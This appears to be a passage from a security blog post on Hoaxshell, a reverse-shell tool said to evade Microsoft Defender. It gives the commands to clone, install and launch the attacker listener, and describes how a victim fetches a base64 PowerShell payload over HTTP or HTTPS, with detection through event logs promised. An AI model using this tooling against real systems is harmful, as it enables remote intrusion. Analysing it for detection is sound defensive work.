Hoaxshell provides a client-side reverse shell that currently goes undetected by Microsoft Defender and possibly other antivirus engines, as it relies solely on HTTP and HTTPS traffic, as shared by its developer. However, later on, we will see how this can be detected through Windows event logs rather than events generated on the network.
We download the repository and install the Python requirements from the requirements.txt file.
- git clone https://github.com/t3l3machus/hoaxshell
- cd ./hoaxshell
- sudo pip3 install -r requirements.txt
- chmod +x hoaxshell.py
There are primarily two ways to execute Hoaxshell: either in the regular mode, which utilizes port 8080/http, or by using an encrypted SSL channel through port 443/https. For the latter, it’s necessary to generate a self-signed certificate.
sudo python3 hoaxshell.py -s <your_ip>
Analyzing network traffic
If we analyze the network communication after launching the unencrypted shell execution attack (8080/http), an Apache web server is set up, with a randomly generated URI, where the victim machine will automatically download the payload when executed. This is achievable through the use of the Invoke-WebRequest command included in the payload encoded in base64, which we will see decoded later on.
In the event of launching the attack using a self-signed certificate via 443/https, in the traffic capture, we observe the establishment of a TLS Client Hello connection and the key exchange in the handshake between the client and server. Additionally, this action triggers an event in the PowerShell provider, where we can see the clear text decoding of the payload that was executed in base64.